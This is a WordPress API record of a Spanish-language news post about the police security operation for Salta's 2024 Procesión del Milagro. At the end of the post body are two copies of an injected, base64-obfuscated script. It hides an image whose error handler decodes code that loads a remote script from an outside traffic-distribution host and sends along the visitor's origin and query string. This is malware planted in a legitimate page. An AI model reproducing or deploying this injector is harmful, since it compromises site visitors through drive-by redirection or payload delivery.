{"id":4409,"date":"2024-09-16T11:38:31","date_gmt":"2024-09-16T14:38:31","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4409"},"modified":"2025-08-13T23:48:39","modified_gmt":"2025-08-14T02:48:39","slug":"el-operativo-de-seguridad-procesion-del-milagro-2024-se-desarrollo-con-normalidad","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4409","title":{"rendered":"El operativo de seguridad \u201cProcesi\u00f3n del Milagro 2024\u201d se desarroll\u00f3 con normalidad"},"content":{"rendered":"\n<h5 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-cbf640041df65027e28ee8db7f722f4e\" style=\"background-color:#5e4604\"><em>El megaoperativo se hizo en diferentes etapas e inici\u00f3 con el acompa\u00f1amiento y asistencia a m\u00e1s de 114 mil peregrinos quienes llegaron a la Catedral bas\u00edlica a rendir honor al Se\u00f1or y a la Virgen del Milagro. Culmin\u00f3 hoy luego de la desconcentraci\u00f3n de alrededor de 650 mil concurrentes a la procesi\u00f3n y al Pacto de Fidelidad.<\/em><\/h5>\n\n\n\n<p>El Ministerio de Seguridad y Justicia de la Provincia informa que se desarroll\u00f3 con normalidad el megaoperativo que realiz\u00f3 la Polic\u00eda de Salta por la procesi\u00f3n en honor al Se\u00f1or y a la Virgen del Milagro, celebraci\u00f3n de la que participaron alrededor de 650 mil fieles.<\/p>\n\n\n\n<p>El intenso servicio policial por el Milagro 2024 se hizo en distintas etapas. Inici\u00f3 con el acompa\u00f1amiento y asistencia a m\u00e1s de 114 mil peregrinos que llegaron a la Capital para participar de una de las festividades religiosas m\u00e1s importantes del pa\u00eds. En este marco, se brindaron diferentes servicios con distintos organismos en todo el territorio provincial.<\/p>\n\n\n\n<p>La Direcci\u00f3n General de Seguridad de la Polic\u00eda habilit\u00f3 un Centro de Monitoreo de Peregrinos para una eficiente coordinaci\u00f3n y asistencia a las 270 peregrinaciones que llegaron a la Catedral Bas\u00edlica de Salta.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/13917-el-operativo-de-seguridad-procesion-del-milagro-2024-se-desarrollo-con-normalidad.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/13917-el-operativo-de-seguridad-procesion-del-milagro-2024-se-desarrollo-con-normalidad.jpg\" alt=\"El operativo de seguridad \u201cProcesi\u00f3n del Milagro 2024\u201d se desarroll\u00f3 con normalidad\"\/><\/a><\/figure>\n\n\n\n<p>La Subsecretar\u00eda de Defensa Civil trabaj\u00f3 en 5 nodos de asistencia integral con la cooperaci\u00f3n de profesionales de la salud. Atendieron a miles de peregrinos.<\/p>\n\n\n\n<p>Tambi\u00e9n hubo un importante despliegue de patrullas durante los d\u00edas del rezo de la novena con unidades especiales de las \u00e1reas investigativas de la Fuerza. Hoy m\u00e1s de 5700 efectivos brindaron la cobertura preventiva de seguridad durante la procesi\u00f3n y el Pacto de Fidelidad, hasta la desconcentraci\u00f3n de los miles de fieles que asistieron. &nbsp;Se trabaj\u00f3 en 26 sectores monitoreados con 60 c\u00e1maras de seguridad del Sistema de Emergencias 911.<\/p>\n\n\n\n<p>En este contexto, la Direcci\u00f3n de Drogas Peligrosas detuvo a 38 personas con sustancias prohibidas, Seguridad Urbana demor\u00f3 a 4 por contravenciones y a un hombre por pedido de captura. Grupos Investigativos detuvieron a 4 personas por distintos delitos.<\/p>\n\n\n\n<p>Al finalizar la celebraci\u00f3n las autoridades del Arzobispado agradecieron y destacaron el importante servicio de seguridad que se brind\u00f3 durante todo el Milagro.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"4410\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/09\/8274-el-operativo-de-seguridad-procesion-del-milagro-2024-se-desarrollo-con-normalidad-1024x576.jpg\" alt=\"\" class=\"wp-image-4410\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/09\/8274-el-operativo-de-seguridad-procesion-del-milagro-2024-se-desarrollo-con-normalidad-1024x576.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/09\/8274-el-operativo-de-seguridad-procesion-del-milagro-2024-se-desarrollo-con-normalidad-300x169.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/09\/8274-el-operativo-de-seguridad-procesion-del-milagro-2024-se-desarrollo-con-normalidad-768x432.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/09\/8274-el-operativo-de-seguridad-procesion-del-milagro-2024-se-desarrollo-con-normalidad-746x420.jpg 746w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/09\/8274-el-operativo-de-seguridad-procesion-del-milagro-2024-se-desarrollo-con-normalidad-696x392.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/09\/8274-el-operativo-de-seguridad-procesion-del-milagro-2024-se-desarrollo-con-normalidad.jpg 1066w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"4412\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/09\/8276-el-operativo-de-seguridad-procesion-del-milagro-2024-se-desarrollo-con-normalidad-1024x576.jpg\" alt=\"\" class=\"wp-image-4412\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/09\/8276-el-operativo-de-seguridad-procesion-del-milagro-2024-se-desarrollo-con-normalidad-1024x576.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/09\/8276-el-operativo-de-seguridad-procesion-del-milagro-2024-se-desarrollo-con-normalidad-300x169.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/09\/8276-el-operativo-de-seguridad-procesion-del-milagro-2024-se-desarrollo-con-normalidad-768x432.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/09\/8276-el-operativo-de-seguridad-procesion-del-milagro-2024-se-desarrollo-con-normalidad-746x420.jpg 746w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/09\/8276-el-operativo-de-seguridad-procesion-del-milagro-2024-se-desarrollo-con-normalidad-696x392.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/09\/8276-el-operativo-de-seguridad-procesion-del-milagro-2024-se-desarrollo-con-normalidad.jpg 1066w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"4411\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/09\/8279-el-operativo-de-seguridad-procesion-del-milagro-2024-se-desarrollo-con-normalidad-1024x576.jpg\" alt=\"\" class=\"wp-image-4411\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/09\/8279-el-operativo-de-seguridad-procesion-del-milagro-2024-se-desarrollo-con-normalidad-1024x576.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/09\/8279-el-operativo-de-seguridad-procesion-del-milagro-2024-se-desarrollo-con-normalidad-300x169.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/09\/8279-el-operativo-de-seguridad-procesion-del-milagro-2024-se-desarrollo-con-normalidad-768x432.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/09\/8279-el-operativo-de-seguridad-procesion-del-milagro-2024-se-desarrollo-con-normalidad-746x420.jpg 746w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/09\/8279-el-operativo-de-seguridad-procesion-del-milagro-2024-se-desarrollo-con-normalidad-696x392.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/09\/8279-el-operativo-de-seguridad-procesion-del-milagro-2024-se-desarrollo-con-normalidad.jpg 1066w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El megaoperativo se hizo en diferentes etapas e inici\u00f3 con el acompa\u00f1amiento y asistencia a m\u00e1s de 114 mil peregrinos quienes llegaron a la Catedral bas\u00edlica a rendir honor al Se\u00f1or y a la Virgen del Milagro. Culmin\u00f3 hoy luego de la desconcentraci\u00f3n de alrededor de 650 mil concurrentes a la procesi\u00f3n y al Pacto [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4412,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,11,18],"tags":[],"class_list":{"0":"post-4409","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-datos-utiles","9":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4409"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4409"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4409\/revisions"}],"predecessor-version":[{"id":6682,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4409\/revisions\/6682"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4412"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4409"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4409"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4409"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}